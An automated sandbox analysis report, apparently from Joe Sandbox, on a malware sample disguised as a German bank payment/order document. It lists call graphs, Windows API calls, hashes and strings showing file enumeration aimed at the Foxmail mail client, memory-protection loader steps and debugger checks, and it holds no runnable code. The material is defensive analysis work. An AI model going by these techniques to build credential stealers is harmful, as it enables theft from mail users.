34f48ed4 7136->7137 7146 34f45671 RtlEnterCriticalSection 7137->7146 7139 34f48f77 7151 34f48f97 7139->7151 7143 34f48f83 7143->7121 7144 34f48e78 65 API calls 7145 34f48ee3 7144->7145 7145->7139 7145->7144 7147 34f47b94 RtlEnterCriticalSection 7145->7147 7148 34f48f6d 7145->7148 7146->7145 7147->7145 7154 34f47ba8 RtlLeaveCriticalSection 7148->7154 7150 34f48f75 7150->7145 7155 34f456b9 RtlLeaveCriticalSection 7151->7155 7153 34f48f9e 7153->7143 7154->7150 7155->7153 7156->7126 7158 34f4a0a8 7157->7158 7159 34f4a0ce 7158->7159 7160 34f4a0b9 7158->7160 7169 34f4a0c9 7159->7169 7173 34f47b94 RtlEnterCriticalSection 7159->7173 7161 34f46368 20 API calls 7160->7161 7163 34f4a0be 7161->7163 7165 34f462ac 26 API calls 7163->7165 7164 34f4a0ea 7174 34f4a026 7164->7174 7165->7169 7167 34f4a0f5 7190 34f4a112 7167->7190 7169->7126 7438 34f456b9 RtlLeaveCriticalSection 7170->7438 7172 34f4907a 7172->7128 7173->7164 7175 34f4a033 7174->7175 7176 34f4a048 7174->7176 7177 34f46368 20 API calls 7175->7177 7182 34f4a043 7176->7182 7193 34f48e12 7176->7193 7178 34f4a038 7177->7178 7180 34f462ac 26 API calls 7178->7180 7180->7182 7182->7167 7183 34f4907c 20 API calls 7184 34f4a064 7183->7184 7199 34f47a5a 7184->7199 7186 34f4a06a 7206 34f4adce 7186->7206 7189 34f4571e 20 API calls 7189->7182 7437 34f47ba8 RtlLeaveCriticalSection 7190->7437 7192 34f4a11a 7192->7169 7194 34f48e2a 7193->7194 7195 34f48e26 7193->7195 7194->7195 7196 34f47a5a 26 API calls 7194->7196 7195->7183 7197 34f48e4a 7196->7197 7221 34f49a22 7197->7221 7200 34f47a66 7199->7200 7201 34f47a7b 7199->7201 7202 34f46368 20 API calls 7200->7202 7201->7186 7203 34f47a6b 7202->7203 7204 34f462ac 26 API calls 7203->7204 7205 34f47a76 7204->7205 7205->7186 7207 34f4adf2 7206->7207 7208 34f4addd 7206->7208 7209 34f4ae2d 7207->7209 7213 34f4ae19 7207->7213 7210 34f46355 20 API calls 7208->7210 7211 34f46355 20 API calls 7209->7211 7212 34f4ade2 7210->7212 7214 34f4ae32 7211->7214 7215 34f46368 20 API calls 7212->7215 7394 34f4ada6 7213->7394 7217 34f46368 20 API calls 7214->7217 7218 34f4a070 7215->7218 7219 34f4ae3a 7217->7219 7218->7182 7218->7189 7220 34f462ac 26 API calls 7219->7220 7220->7218 7222 34f49a2e 7221->7222 7223 34f49a36 7222->7223 7224 34f49a4e 7222->7224 7246 34f46355 7223->7246 7226 34f49aec 7224->7226 7230 34f49a83 7224->7230 7228 34f46355 20 API calls 7226->7228 7231 34f49af1 7228->7231 7229 34f46368 20 API calls 7232 34f49a43 7229->7232 7249 34f48c7b RtlEnterCriticalSection 7230->7249 7234 34f46368 20 API calls 7231->7234 7232->7195 7236 34f49af9 7234->7236 7235 34f49a89 7237 34f49aa5 7235->7237 7238 34f49aba 7235->7238 7239 34f462ac 26 API calls 7236->7239 7240 34f46368 20 API calls 7237->7240 7250 34f49b0d 7238->7250 7239->7232 7242 34f49aaa 7240->7242 7244 34f46355 20 API calls 7242->7244 7243 34f49ab5 7301 34f49ae4 7243->7301 7244->7243 7247 34f45b7a 20 API calls 7246->7247 7248 34f4635a 7247->7248 7248->7229 7249->7235 7251 34f49b3b 7250->7251 7297 34f49b34 7250->7297 7252 34f49b5e 7251->7252 7253 34f49b3f 7251->7253 7258 34f49baf 7252->7258 7259 34f49b92 7252->7259 7254 34f46355 20 API calls 7253->7254 7257 34f49b44 7254->7257 7255 34f42ada 5 API calls 7256 34f49d15 7255->7256 7256->7243 7261 34f46368 20 API calls 7257->7261 7262 34f49bc5 7258->7262 7304 34f4a00b 7258->7304 7260 34f46355 20 API calls 7259->7260 7263 34f49b97 7260->7263 7264 34f49b4b 7261->7264 7307 34f496b2 7262->7307 7267 34f46368 20 API calls 7263->7267 7268 34f462ac 26 API calls 7264->7268 7270 34f49b9f 7267->7270 7268->7297 7273 34f462ac 26 API calls 7270->7273 7271 34f49bd3 7276 34f49bd7 7271->7276 7277 34f49bf9 7271->7277 7272 34f49c0c 7274 34f49c66 WriteFile 7272->7274 7275 34f49c20 7272->7275 7273->7297 7278 34f49c89 GetLastError 7274->7278 7286 34f49bef 7274->7286 7280 34f49c56 7275->7280 7281 34f49c28 7275->7281 7290 34f49ccd 7276->7290 7314 34f49645 7276->7314 7319 34f49492 GetConsoleCP 7277->7319 7278->7286 7345 34f49728 7280->7345 7284 34f49c46 7281->7284 7287 34f49c2d 7281->7287 7337 34f498f5 7284->7337 7285 34f46368 20 API calls 7289 34f49cf2 7285->7289 7286->7290 7291 34f49ca9 7286->7291 7286->7297 7287->7290 7330 34f49807 7287->7330 7293 34f46355 20 API calls 7289->7293 7290->7285 7290->7297 7294 34f49cc4 7291->7294 7295 34f49cb0 7291->7295 7293->7297 7352 34f46332 7294->7352 7298 34f46368 20 API calls 7295->7298 7297->7255 7299 34f49cb5 7298->7299 7300 34f46355 20 API calls 7299->7300 7300->7297 7393 34f48c9e RtlLeaveCriticalSection 7301->7393 7303 34f49aea 7303->7232 7357 34f49f8d 7304->7357 7379 34f48dbc 7307->7379 7309 34f496c7 7309->7271 7309->7272 7310 34f496c2 7310->7309 7311 34f45af6 38 API calls 7310->7311 7312 34f496ea 7311->7312 7312->7309 7313 34f49708 GetConsoleMode 7312->7313 7313->7309 7316 34f4969f 7314->7316 7318 34f4966a 7314->7318 7315 34f496a1 GetLastError 7315->7316 7316->7286 7317 34f4a181 WriteConsoleW 7317->7318 7318->7315 7318->7316 7318->7317 7320 34f49607 7319->7320 7324 34f494f5 7319->7324 7321 34f42ada 5 API calls 7320->7321 7322 34f49641 7321->7322 7322->7286 7324->7320 7325 34f4957b WideCharToMultiByte 7324->7325 7327 34f479e6 40 API calls 7324->7327 7329 34f495d2 WriteFile 7324->7329 7388 34f47c19 7324->7388 7325->7320 7326 34f495a1 WriteFile 7325->7326 7326->7324 7328 34f4962a GetLastError 7326->7328 7327->7324 7328->7320 7329->7324 7329->7328 7334 34f49816 7330->7334 7331 34f498d8 7333 34f42ada 5 API calls 7331->7333 7332 34f49894 WriteFile 7332->7334 7335 34f498da GetLastError 7332->7335 7336 34f498f1 7333->7336 7334->7331 7334->7332 7335->7331 7336->7286 7342 34f49904 7337->7342 7338 34f49a0f 7339 34f42ada 5 API calls 7338->7339 7341 34f49a1e 7339->7341 7340 34f49986 WideCharToMultiByte 7343 34f49a07 GetLastError 7340->7343 7344 34f499bb WriteFile 7340->7344 7341->7286 7342->7338 7342->7340 7342->7344 7343->7338 7344->7342 7344->7343 7347 34f49737 7345->7347 7346 34f497ea 7349 34f42ada 5 API calls 7346->7349 7347->7346 7348 34f497a9 WriteFile 7347->7348 7348->7347 7350 34f497ec GetLastError 7348->7350 7351 34f49803 7349->7351 7350->7346 7351->7286 7353 34f46355 20 API calls 7352->7353 7354 34f4633d 7353->7354 7355 34f46368 20 API calls 7354->7355 7356 34f46350 7355->7356 7356->7297 7366 34f48d52 7357->7366 7359 34f49f9f 7360 34f49fa7 7359->7360 7361 34f49fb8 SetFilePointerEx 7359->7361 7362 34f46368 20 API calls 7360->7362 7363 34f49fd0 GetLastError 7361->7363 7364 34f49fac 7361->7364 7362->7364 7365 34f46332 20 API calls 7363->7365 7364->7262 7365->7364 7367 34f48d74 7366->7367 7368 34f48d5f 7366->7368 7370 34f46355 20 API calls 7367->7370 7372 34f48d99 7367->7372 7369 34f46355 20 API calls 7368->7369 7371 34f48d64 7369->7371 7373 34f48da4 7370->7373 7374 34f46368 20 API calls 7371->7374 7372->7359 7376 34f46368 20 API calls 7373->7376 7375 34f48d6c 7374->7375 7375->7359 7377 34f48dac 7376->7377 7378 34f462ac 26 API calls 7377->7378 7378->7375 7380 34f48dc9 7379->7380 7382 34f48dd6 7379->7382 7381 34f46368 20 API calls 7380->7381 7383 34f48dce 7381->7383 7384 34f48de2 7382->7384 7385 34f46368 20 API calls 7382->7385 7383->7310 7384->7310 7386 34f48e03 7385->7386 7387 34f462ac 26 API calls 7386->7387 7387->7383 7389 34f45af6 38 API calls 7388->7389 7390 34f47c24 7389->7390 7391 34f47a00 38 API calls 7390->7391 7392 34f47c34 7391->7392 7392->7324 7393->7303 7397 34f4ad24 7394->7397 7396 34f4adca 7396->7218 7398 34f4ad30 7397->7398 7408 34f48c7b RtlEnterCriticalSection 7398->7408 7400 34f4ad3e 7401 34f4ad65 7400->7401 7402 34f4ad70 7400->7402 7409 34f4ae4d 7401->7409 7404 34f46368 20 API calls 7402->7404 7405 34f4ad6b 7404->7405 7424 34f4ad9a 7405->7424 7407 34f4ad8d 7407->7396 7408->7400 7410 34f48d52 26 API calls 7409->7410 7411 34f4ae5d 7410->7411 7412 34f4ae63 7411->7412 7414 34f4ae95 7411->7414 7416 34f48d52 26 API calls 7411->7416 7427 34f48cc1 7412->7427 7414->7412 7417 34f48d52 26 API calls 7414->7417 7420 34f4ae8c 7416->7420 7418 34f4aea1 CloseHandle 7417->7418 7418->7412 7421 34f4aead GetLastError 7418->7421 7419 34f4aedd 7419->7405 7423 34f48d52 26 API calls 7420->7423 7421->7412 7422 34f46332 20 API calls 7422->7419 7423->7414 7436 34f48c9e RtlLeaveCriticalSection 7424->7436 7426 34f4ada4 7426->7407 7428 34f48d37 7427->7428 7431 34f48cd0 7427->7431 7429 34f46368 20 API calls 7428->7429 7430 34f48d3c 7429->7430 7432 34f46355 20 API calls 7430->7432 7431->7428 7435 34f48cfa 7431->7435 7433 34f48d27 7432->7433 7433->7419 7433->7422 7434 34f48d21 SetStdHandle 7434->7433 7435->7433 7435->7434 7436->7426 7437->7192 7438->7172 6914 34f48a89 6915 34f46d60 51 API calls 6914->6915 6916 34f48a8e 6915->6916

                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                          Function 34F410F1 Relevance: 12.1, APIs: 8, Instructions: 88stringfileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 34F41137
                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 34F41151
                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 34F4115C
                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 34F4116D
                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 34F4117C
                                                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 34F41193
                                                                                                                                                                                                                                          • FindNextFileW.KERNELBASE(00000000,00000010), ref: 34F411D0
                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 34F411DB
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1083526818-0
                                                                                                                                                                                                                                          • Opcode ID: 3aa253f162d89775e1cb3a6e0945ff3ecb4f52b1b93d4143e72cdd9a787a72a4
                                                                                                                                                                                                                                          • Instruction ID: eeeec01f6fda75c505b0b1b1385cc33850b7d3a0f5b68af8f581d8873a8463e8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3aa253f162d89775e1cb3a6e0945ff3ecb4f52b1b93d4143e72cdd9a787a72a4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 06219371504308ABD720EB65EC4CF9B7B9CEF84354F080D2AB958D3291EB30D64687D6
                                                                                                                                                                                                                                          Function 02D41207 Relevance: 3.1, APIs: 2, Instructions: 59sleepCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 122 2d41207-2d4123b 123 2d4123d-2d4124c call 2d41756 122->123 125 2d41253-2d41263 123->125 126 2d4124e 123->126 127 2d41265-2d4126c Sleep 125->127 128 2d41273-2d412c8 NtProtectVirtualMemory call 2d41756 125->128 126->125 127->122 130 2d412cd-2d412e1 128->130 130->122
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.7792890064.00000000025B5000.00000040.00000400.00020000.00000000.sdmp, Offset: 025B5000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_25b5000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Sleep
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3472027048-0
                                                                                                                                                                                                                                          • Opcode ID: 201ee6755f9b0c0f2be47f5d5ace9fd3901271bf45be85c1329fd8055c74557b
                                                                                                                                                                                                                                          • Instruction ID: e15654bd0a160c14a4e14dce51951c2d55574a698da3e65ef4ffa7838b943332
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 201ee6755f9b0c0f2be47f5d5ace9fd3901271bf45be85c1329fd8055c74557b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 731122B1A003019FEB009E34CDCDB9A7666EF40760F86C059E9A4CB1A2DB74C9C5CF12
                                                                                                                                                                                                                                          Function 34F412EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 243stringCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,?), ref: 34F41434
                                                                                                                                                                                                                                            • Part of subcall function 34F410F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 34F41137
                                                                                                                                                                                                                                            • Part of subcall function 34F410F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 34F41151
                                                                                                                                                                                                                                            • Part of subcall function 34F410F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 34F4115C
                                                                                                                                                                                                                                            • Part of subcall function 34F410F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 34F4116D
                                                                                                                                                                                                                                            • Part of subcall function 34F410F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 34F4117C
                                                                                                                                                                                                                                            • Part of subcall function 34F410F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 34F41193
                                                                                                                                                                                                                                            • Part of subcall function 34F410F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 34F411D0
                                                                                                                                                                                                                                            • Part of subcall function 34F410F1: FindClose.KERNEL32(00000000), ref: 34F411DB
                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 34F414C5
                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 34F414E0
                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 34F4150F
                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(00000000), ref: 34F41521
                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 34F41547
                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(00000000), ref: 34F41553
                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 34F41579
                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(00000000), ref: 34F41585
                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 34F415AB
                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(00000000), ref: 34F415B7
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                                                                                                                                                          • String ID: )$Foxmail$ProgramFiles
                                                                                                                                                                                                                                          • API String ID: 672098462-2938083778
                                                                                                                                                                                                                                          • Opcode ID: 8c8db18cb97f5561d4bf6ecb4f8ced6d1625c13d07e83c823bc3a03e0013b8fe
                                                                                                                                                                                                                                          • Instruction ID: f8197d88e87a2f55b993bdc8551de884e3a7d4aafbf8a4d54fe0243c38120a9e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c8db18cb97f5561d4bf6ecb4f8ced6d1625c13d07e83c823bc3a03e0013b8fe
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2381D271A00368AAEB20DBA1DC45FDE7739EF84710F0409D6F608E7290EEB15A85CF94
                                                                                                                                                                                                                                          Function 34F4C7E6 Relevance: 9.1, APIs: 6, Instructions: 70libraryloaderCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(34F4C7DD), ref: 34F4C7E6
                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,34F4C7DD), ref: 34F4C838
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 34F4C860
                                                                                                                                                                                                                                            • Part of subcall function 34F4C803: GetProcAddress.KERNEL32(00000000,34F4C7F4), ref: 34F4C804
                                                                                                                                                                                                                                            • Part of subcall function 34F4C803: VirtualProtect.KERNEL32(?,?,?,?,00000000,00000000,34F4C7F4,34F4C7DD), ref: 34F4C816
                                                                                                                                                                                                                                            • Part of subcall function 34F4C803: VirtualProtect.KERNEL32(?,?,?,?,?,00000000,00000000,34F4C7F4,34F4C7DD), ref: 34F4C82A
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2099061454-0
                                                                                                                                                                                                                                          • Opcode ID: 0d40a1f1873badcc7abd17615b577454aacf23acbaf30437919bc32e48719f70
                                                                                                                                                                                                                                          • Instruction ID: 3d3c7bf97a255ea7542e2f5b13d321da91dddc611001ee04a632527c7eb11f0e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0d40a1f1873badcc7abd17615b577454aacf23acbaf30437919bc32e48719f70
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C211CE556452C1ACFB118674CC00AAA6FD89B277B0F1E3E5AA080C6393DDA4850383A6
                                                                                                                                                                                                                                          Function 34F4C7C4 Relevance: 7.6, APIs: 5, Instructions: 84COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2099061454-0
                                                                                                                                                                                                                                          • Opcode ID: 3e908f2ecaa81469cdc02b0ad555967abb4b048711ac79a921ad9b24b7d5fded
                                                                                                                                                                                                                                          • Instruction ID: 3431f5c39f2340bc6ed7d3612044d5209ffa988d91859cd7e072b25a8f91761a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e908f2ecaa81469cdc02b0ad555967abb4b048711ac79a921ad9b24b7d5fded
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BC1103556093C16EF72146748C40AB67FD98B677B4F1E2E8AD080CB383DDA48447C3B6
                                                                                                                                                                                                                                          Function 34F4C803 Relevance: 7.6, APIs: 5, Instructions: 54librarymemoryloaderCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 103 34f4c803-34f4c80b GetProcAddress 104 34f4c82d 103->104 105 34f4c80d-34f4c81a VirtualProtect 103->105 108 34f4c82f-34f4c833 104->108 106 34f4c82c 105->106 107 34f4c81c-34f4c82a VirtualProtect 105->107 106->104 107->106 109 34f4c835-34f4c83d GetModuleHandleA 108->109 110 34f4c872 LdrInitializeThunk 108->110 111 34f4c83f-34f4c847 109->111 111->111 112 34f4c849-34f4c84c 111->112 112->108 113 34f4c84e-34f4c850 112->113 114 34f4c856-34f4c85e 113->114 115 34f4c852-34f4c854 113->115 116 34f4c85f-34f4c865 GetProcAddress 114->116 115->116 119 34f4c866-34f4c86e 116->119 121 34f4c870 119->121 121->112
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,34F4C7F4), ref: 34F4C804
                                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(?,?,?,?,00000000,00000000,34F4C7F4,34F4C7DD), ref: 34F4C816
                                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(?,?,?,?,?,00000000,00000000,34F4C7F4,34F4C7DD), ref: 34F4C82A
                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,34F4C7DD), ref: 34F4C838
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 34F4C860
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2152742572-0
                                                                                                                                                                                                                                          • Opcode ID: 9140eaa08c5d122f984b313d2600f35573c21d4dae5556e03d594b9c17f04e83
                                                                                                                                                                                                                                          • Instruction ID: 57f41a4ff7c32f6ef319408e38a5063af54efcbf726faf637a6bd11f8d43dbb9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9140eaa08c5d122f984b313d2600f35573c21d4dae5556e03d594b9c17f04e83
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 81F0C2856853C07CFA1145B48C41AB66FCC8B277B1B1E3E5AE140C7383DC95850783F6

                                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                                          Function 34F460E2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 34F461DA
                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 34F461E4
                                                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 34F461F1
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                          • String ID: h#9/
                                                                                                                                                                                                                                          • API String ID: 3906539128-176419635
                                                                                                                                                                                                                                          • Opcode ID: 189828f2e5f8a30e522dbe9e744fbc3644d9080ae6b5b1509506b0fb4069ad10
                                                                                                                                                                                                                                          • Instruction ID: 0a20859c7631741e42409035ac389393b802a3921f8971648f845c6098c4a390
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 189828f2e5f8a30e522dbe9e744fbc3644d9080ae6b5b1509506b0fb4069ad10
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D31D87490121C9BDB61DF24D98878DBBB4FF08310F5445EAE91CA7260EB349B828F45
                                                                                                                                                                                                                                          Function 34F42639 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 34F42645
                                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,00000017), ref: 34F42710
                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,00000017), ref: 34F42730
                                                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,00000017), ref: 34F4273A
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 254469556-0
                                                                                                                                                                                                                                          • Opcode ID: 8966ce359cce6a56e5f40edb4934bcd43778f88519524c0e205861d602d95146
                                                                                                                                                                                                                                          • Instruction ID: fea1b9cc699072c39eac7631b1a0bde9064b96ae1629be6199c423cd97255155
